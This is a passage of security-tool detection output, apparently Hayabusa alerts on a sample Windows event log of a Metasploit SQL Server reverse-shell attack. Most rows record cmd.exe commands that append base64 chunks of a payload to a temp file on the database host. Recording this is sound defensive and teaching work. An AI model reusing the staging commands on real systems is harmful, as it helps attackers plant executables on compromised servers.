2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggJXM+Q29ubmVjdDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgA8dHIg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo JXM+PHRoICVzPiZuYnNwOzwvdGg+IDx0aCAlcz5taW48L3RoPiAgIDx0aCAlcz5hdmc8L3RoPiAgIDx0aCAlcz5tYXg8L3RoPjwvdHI+CgA8dHIgJXM+PHRoICVzIGNvbHNwYW49ND5Db25ubmVjdGlvbiBUaW1lcyAobXMpPC90aD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49MiAlcz4mbmJzcDs8L3RkPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHRvdGFsPC90ZD48L3RyPgoAADx0ciAlcz48dGQgY29sc3Bhbj0yICVzPiZuYnNwOzwvdGQ+PHRkIGNvbHNwYW49MiAlcz4lLjJmIGtiL3Mgc2VudDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VHJhbnNmZXIgcmF0ZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHJlY2VpdmVkPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+UmVxdWVzdHMgcGVyIHNlY29uZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZjwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkhUTUwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Ub3RhbCBQVVQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkPC90ZD48L3RyPgoAAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRvdGFsIFBPU1RlZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JUk2NGQ8L3RkPjwvdHI+CgAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VG90YWwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPktlZXAtQWxpdmUgcmVxdWVzdHM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+Tm9uLTJ4eCByZXNwb25zZXM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49NCAlcyA+ICAgKENvbm5lY3Q6ICVkLCBMZW5ndGg6ICVkLCBFeGNlcHRpb25zOiAlZCk8L3RkPjwvdHI+CgAAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RmFpbGVkIHJlcXVlc3Rz>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo IDE5OTYgQWRhbSBUd2lzcywgWmV1cyBUZWNobm9sb2d5IEx0ZCwgaHR0cDovL3d3dy56ZXVzdGVjaC5uZXQvPGJyPgoAACBUaGlzIGlzIEFwYWNoZUJlbmNoLCBWZXJzaW9uICVzIDxpPiZsdDslcyZndDs8L2k+PGJyPgoAJFJldmlzaW9uOiA2NTU2NTQgJAA8cD4KAAAAAAAAAABMaWNlbnNlZCB0byBUaGUgQXBhY2hlIFNvZnR3YXJlIEZvdW5kYXRpb24sIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy8KAAAAAABDb3B5cmlnaHQgMTk5NiBBZGFtIFR3aXNzLCBaZXVzIFRlY2hub2xvZ3kgTHRkLCBodHRwOi8vd3d3LnpldXN0ZWNoLm5ldC8KAAAAVGhpcyBpcyBBcGFjaGVCZW5jaCwgVmVyc2lvbiAlcwoAAAAAMi4zIDwkUmV2aXNpb246IDY1NTY1NCAkPgAAACAgICAtaCAgICAgICAgICAgICAgRGlzcGxheSB1c2FnZSBpbmZvcm1hdGlvbiAodGhpcyBtZXNzYWdlKQoAAAAgICAgLXIgICAgICAgICAgICAgIERvbid0IGV4aXQgb24gc29ja2V0IHJlY2VpdmUgZXJyb3JzLgoAAAAgICAgLWUgZmlsZW5hbWUgICAgIE91dHB1dCBDU1YgZmlsZSB3aXRoIHBlcmNlbnRhZ2VzIHNlcnZlZAoAAAAAICAgIC1nIGZpbGVuYW1lICAgICBPdXRwdXQgY29sbGVjdGVkIGRhdGEgdG8gZ251cGxvdCBmb3JtYXQgZmlsZS4KAAAAAAAAICAgIC1TICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBjb25maWRlbmNlIGVzdGltYXRvcnMgYW5kIHdhcm5pbmdzLgoAAAAAICAgIC1kICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBwZXJjZW50aWxlcyBzZXJ2ZWQgdGFibGUuCgAAICAgIC1rICAgICAgICAgICAgICBVc2UgSFRUUCBLZWVwQWxpdmUgZmVhdHVyZQoAICAgIC1WICAgICAgICAgICAgICBQcmludCB2ZXJzaW9uIG51bWJlciBhbmQgZXhpdAoAACAgICAtWCBwcm94eTpwb3J0ICAgUHJveHlzZXJ2ZXIgYW5kIHBvcnQgbnVtYmVyIHRvIHVzZQoAICAgIC1QIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgUHJveHkgQXV0aGVudGljYXRpb24sIHRoZSBhdHRyaWJ1dGVzCgAAAAAAICAgICAgICAgICAgICAgICAgICBhcmUgYSBjb2xvbiBzZXBhcmF0ZWQgdXNlcm5hbWUgYW5kIHBhc3N3b3JkLgoAAAAAAAAAICAgIC1BIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgV1dXIEF1dGhlbnRpY2F0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aW9uLCB0aGUgYXR0cmlidXRlcwoAAAAAAAAAICAgICAgICAgICAgICAgICAgICBJbnNlcnRlZCBhZnRlciBhbGwgbm9ybWFsIGhlYWRlciBsaW5lcy4gKHJlcGVhdGFibGUpCgAAAAAAAAAgICAgLUggYXR0cmlidXRlICAgIEFkZCBBcmJpdHJhcnkgaGVhZGVyIGxpbmUsIGVnLiAnQWNjZXB0LUVuY29kaW5nOiBnemlwJwoAAAAAACAgICAtQyBhdHRyaWJ1dGUgICAgQWRkIGNvb2tpZSwgZWcuICdBcGFjaGU9MTIzNC4gKHJlcGVhdGFibGUpCgAgICAgLXogYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGQgb3IgdGggYXR0cmlidXRlcwoAAAAAICAgIC15IGF0dHJpYnV0ZXMgICBTdHJpbmcgdG8gaW5zZXJ0IGFzIHRyIGF0dHJpYnV0ZXMKAAAgICAgLXggYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGFibGUgYXR0cmlidXRlcwoAAAAgICAgLWkgICAgICAgICAgICAgIFVzZSBIRUFEIGluc3RlYWQgb2YgR0VUCgAAAAAgICAgLXcgICAgICAgICAgICAgIFByaW50IG91dCByZXN1bHRzIGluIEhUTUwgdGFibGVzCgAAACAgICAtdiB2ZXJib3NpdHkgICAgSG93IG11Y2ggdHJvdWJsZXNob290aW5nIGluZm8gdG8gcHJpbnQKACAgICAgICAgICAgICAgICAgICAgRGVmYXVsdCBpcyAndGV4dC9wbGFpbicKAAAAACAgICAgICAgICAgICAgICAgICAgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKAAAAACAgICAtVCBjb250ZW50LXR5cGUgQ29udGVudC10eXBlIGhlYWRlciBmb3IgUE9TVGluZywgZWcuCgAAACAgICAtdSBwdXRmaWxlICAgICAgRmlsZSBjb250YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAAAAAAAAAICAgIC1wIHBvc3RmaWxlICAgICBGaWxlIGNvbnRhaW5pbmcgZGF0YSB0byBQT1NULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAACAgICAtYiB3aW5kb3dzaXplICAgU2l6ZSBvZiBUQ1Agc2VuZC9yZWNlaXZlIGJ1ZmZlciwgaW4gYnl0ZXMKAAAgICAgLXQgdGltZWxpbWl0ICAgIFNlY29uZHMgdG8gbWF4LiB3YWl0IGZvciByZXNwb25zZXMKACAgICAtYyBjb25jdXJyZW5jeSAgTnVtYmVyIG9mIG11bHRpcGxlIHJlcXVlc3RzIHRvIG1ha2UKAAAAACAgICAtbiBy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXF1ZXN0cyAgICAgTnVtYmVyIG9mIHJlcXVlc3RzIHRvIHBlcmZvcm0KAABPcHRpb25zIGFyZToKAAAAVXNhZ2U6ICVzIFtvcHRpb25zXSBbaHR0cDovL11ob3N0bmFtZVs6cG9ydF0vcGF0aAoAADolZABTU0wgbm90IGNvbXBpbGVkIGluOyBubyBodHRwcyBzdXBwb3J0CgAAaHR0cHM6Ly8AAAAAWyVzXQAAAABodHRwOi8vAGFiOiBDb3VsZCBub3QgcmVhZCBQT1NUIGRhdGEgZmlsZTogJXMKAABhYjogQ291bGQgbm90IGFsbG9jYXRlIFBPU1QgZGF0YSBidWZmZXIKAAAAAGFiOiBDb3VsZCBub3Qgc3RhdCBQT1NUIGRhdGEgZmlsZSAoJXMpOiAlcwoAYWI6IENvdWxkIG5vdCBvcGVuIFBPU1QgZGF0YSBmaWxlICglcyk6ICVzCgBhcHJfZ2xvYmFsX3Bvb2wAJWQuJWQlYwAqKioqAAAAACUzZCVjAAAAJTNkIAAAAAAgIC0gAAAAAEtNR1RQRQAAJXM6IGlsbGVnYWwgb3B0aW9uIC0tICVjCgAAACVzOiBvcHRpb24gcmVxdWlyZXMgYW4gYXJndW1lbnQgLS0gJWMKAABDb21tYW5kTGluZVRvQXJndlcAAGFwcl9pbml0aWFsaXplAAAwMTIzNDU2Nzg5LgAwLjAuMC4wAGJvZ3VzICVwAAAAAEk2NGQAAAAATm8gaG9zdCBkYXRhIG9mIHRoYXQgdHlwZSB3YXMgZm91bmQASG9zdCBub3QgZm91bmQAAEdyYWNlZnVsIHNodXRkb3duIGluIHByb2dyZXNzAAAAV1NBU3RhcnR1cCBub3QgeWV0IGNhbGxlZAAAAFdpbnNvY2sgdmVyc2lvbiBvdXQgb2YgcmFuZ2UAAAAATmV0d29yayBzeXN0ZW0gaXMgdW5hdmFpbGFibGUAAABUb28gbWFueSBsZXZlbHMgb2YgcmVtb3RlIGluIHBhdGgAAABTdGFsZSBORlMgZmlsZSBoYW5kbGUAAABEaXNjIHF1b3RhIGV4Y2VlZGVkAFRvbyBtYW55IHVzZXJzAABUb28gbWFueSBwcm9jZXNzZXMAAERpcmVjdG9yeSBub3QgZW1wdHkATm8gcm91dGUgdG8gaG9zdAAAAABIb3N0IGlzIGRvd24AAAAARmlsZSBuYW1lIHRvbyBsb25nAABUb28gbWFueSBsZXZlbHMgb2Ygc3ltYm9saWMgbGlua3MAAABDb25uZWN0aW9uIHJlZnVzZWQAAENvbm5lY3Rpb24gdGltZWQgb3V0AAAAAFRvbyBtYW55IHJlZmVyZW5jZXMsIGNhbid0IHNwbGljZQAAAENhbid0IHNlbmQgYWZ0ZXIgc29ja2V0IHNodXRkb3duAAAAAFNvY2tldCBpcyBub3QgY29ubmVjdGVk>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AFNvY2tldCBpcyBhbHJlYWR5IGNvbm5lY3RlZABObyBidWZmZXIgc3BhY2UgYXZhaWxhYmxlAAAAQ29ubmVjdGlvbiByZXNldCBieSBwZWVyAAAAAFNvZnR3YXJlIGNhdXNlZCBjb25uZWN0aW9uIGFib3J0AAAAAE5ldCBjb25uZWN0aW9uIHJlc2V0AAAAAE5ldHdvcmsgaXMgdW5yZWFjaGFibGUAAE5ldHdvcmsgaXMgZG93bgBDYW4ndCBhc3NpZ24gcmVxdWVzdGVkIGFkZHJlc3MAAEFkZHJlc3MgYWxyZWFkeSBpbiB1c2UAAEFkZHJlc3MgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAAAAUHJvdG9jb2wgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAABPcGVyYXRpb24gbm90IHN1cHBvcnRlZCBvbiBzb2NrZXQAAABTb2NrZXQgdHlwZSBub3Qgc3VwcG9ydGVkAAAAUHJvdG9jb2wgbm90IHN1cHBvcnRlZAAAQmFkIHByb3RvY29sIG9wdGlvbgBQcm90b2NvbCB3cm9uZyB0eXBlIGZvciBzb2NrZXQAAE1lc3NhZ2UgdG9vIGxvbmcAAAAARGVzdGluYXRpb24gYWRkcmVzcyByZXF1aXJlZAAAAABTb2NrZXQgb3BlcmF0aW9uIG9uIG5vbi1zb2NrZXQAAE9wZXJhdGlvbiBhbHJlYWR5IGluIHByb2dyZXNzAAAAT3BlcmF0aW9uIG5vdyBpbiBwcm9ncmVzcwAAAE9wZXJhdGlvbiB3b3VsZCBibG9jawAAAFRvbyBtYW55IG9wZW4gc29ja2V0cwAAAEludmFsaWQgYXJndW1lbnQAAAAAQmFkIGFkZHJlc3MAUGVybWlzc2lvbiBkZW5pZWQAAABCYWQgZmlsZSBudW1iZXIASW50ZXJydXB0ZWQgc3lzdGVtIGNhbGwAQVBSIGRvZXMgbm90IHVuZGVyc3RhbmQgdGhpcyBlcnJvciBjb2RlAEVycm9yIHN0cmluZyBub3Qgc3BlY2lmaWVkIHlldAAAcGFzc3dvcmRzIGRvIG5vdCBtYXRjaAAAVGhpcyBmdW5jdGlvbiBoYXMgbm90IGJlZW4gaW1wbGVtZW50ZWQgb24gdGhpcyBwbGF0Zm9ybQAAAAAAVGhlcmUgaXMgbm8gZXJyb3IsIHRoaXMgdmFsdWUgc2lnbmlmaWVzIGFuIGluaXRpYWxpemVkIGVycm9yIGNvZGUAAABTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGEga2V5IHN5c3RlbQBTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGZpbGVzAAAAAFNoYXJlZCBtZW1vcnkgaXMgaW1wbGVtZW50ZWQgYW5vbnltb3VzbHkAAAAAQ291bGQgbm90IGZpbmQgc3Bl>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Y2lmaWVkIHNvY2tldCBpbiBwb2xsIGxpc3QuAAAARW5kIG9mIGZpbGUgZm91bmQAAABNaXNzaW5nIHBhcmFtZXRlciBmb3IgdGhlIHNwZWNpZmllZCBjb21tYW5kIGxpbmUgb3B0aW9uAEJhZCBjaGFyYWN0ZXIgc3BlY2lmaWVkIG9uIGNvbW1hbmQgbGluZQBQYXJ0aWFsIHJlc3VsdHMgYXJlIHZhbGlkIGJ1dCBwcm9jZXNzaW5nIGlzIGluY29tcGxldGUAAFRoZSB0aW1lb3V0IHNwZWNpZmllZCBoYXMgZXhwaXJlZAAAAFRoZSBzcGVjaWZpZWQgY2hpbGQgcHJvY2VzcyBpcyBub3QgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIGNoaWxkIHByb2Nlc3MgaXMgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIHRocmVhZCBpcyBub3QgZGV0YWNoZWQAAAAAVGhlIHNwZWNpZmllZCB0aHJlYWQgaXMgZGV0YWNoZWQAAAAAAAAAAFlvdXIgY29kZSBqdXN0IGZvcmtlZCwgYW5kIHlvdSBhcmUgY3VycmVudGx5IGV4ZWN1dGluZyBpbiB0aGUgcGFyZW50IHByb2Nlc3MAAAAAWW91ciBjb2RlIGp1c3QgZm9ya2VkLCBhbmQgeW91IGFyZSBjdXJyZW50bHkgZXhlY3V0aW5nIGluIHRoZSBjaGlsZCBwcm9jZXNzAEludGVybmFsIGVycm9yAABUaGUgcHJvY2VzcyBpcyBub3QgcmVjb2duaXplZC4AAFRoZSBnaXZlbiBwYXRoIGNvbnRhaW5lZCB3aWxkY2FyZCBjaGFyYWN0ZXJzAAAAAFRoZSBnaXZlbiBwYXRoIGlzIG1pc2Zvcm1hdHRlZCBvciBjb250YWluZWQgaW52YWxpZCBjaGFyYWN0ZXJzAABUaGUgZ2l2ZW4gcGF0aCB3YXMgYWJvdmUgdGhlIHJvb3QgcGF0aAAAVGhlIGdpdmVuIHBhdGggaXMgaW5jb21wbGV0ZQAAAABUaGUgZ2l2ZW4gcGF0aCBpcyByZWxhdGl2ZQAAVGhlIGdpdmVuIHBhdGggaXMgYWJzb2x1dGUAAFRoZSBzcGVjaWZpZWQgbmV0d29yayBtYXNrIGlzIGludmFsaWQuAABUaGUgc3BlY2lmaWVkIElQIGFkZHJlc3MgaXMgaW52YWxpZC4AAAAARFNPIGxvYWQgZmFpbGVkAE5vIHNoYXJlZCBtZW1vcnkgaXMgY3VycmVudGx5IGF2YWlsYWJsZQBObyB0aHJlYWQga2V5IHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyB0aHJlYWQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABO>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo byBzb2NrZXQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABObyBwb2xsIHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAAAAAE5vIGxvY2sgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAATm8gZGlyZWN0b3J5IHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4ATm8gdGltZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyBwcm9jZXNzIHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4AAABBbiBpbnZhbGlkIHNvY2tldCB3YXMgcmV0dXJuZWQAAEFuIGludmFsaWQgZGF0ZSBoYXMgYmVlbiBwcm92aWRlZAAAAEEgbmV3IHBvb2wgY291bGQgbm90IGJlIGNyZWF0ZWQuAAAAAFVucmVjb2duaXplZCBXaW4zMiBlcnJvciBjb2RlICVkAAAAAFwAXAA/AFwAVQBOAEMAXAAAAAAAXABcAD8AXAAAAAAAQ2FuY2VsSW8AAAAAR2V0Q29tcHJlc3NlZEZpbGVTaXplQQAAR2V0Q29tcHJlc3NlZEZpbGVTaXplVwAAWndRdWVyeUluZm9ybWF0aW9uRmlsZQAAR2V0U2VjdXJpdHlJbmZvAEdldE5hbWVkU2VjdXJpdHlJbmZvQQAAAEdldE5hbWVkU2VjdXJpdHlJbmZvVwAAAFUATgBDAFwAAAAAAEdldEVmZmVjdGl2ZVJpZ2h0c0Zyb21BY2xXAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////bnRkbGwuZGxsAAAAc2hlbGwzMgB3czJfMzIAAG1zd3NvY2sAYWR2YXBpMzIAAAAAa2VybmVsMzIAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA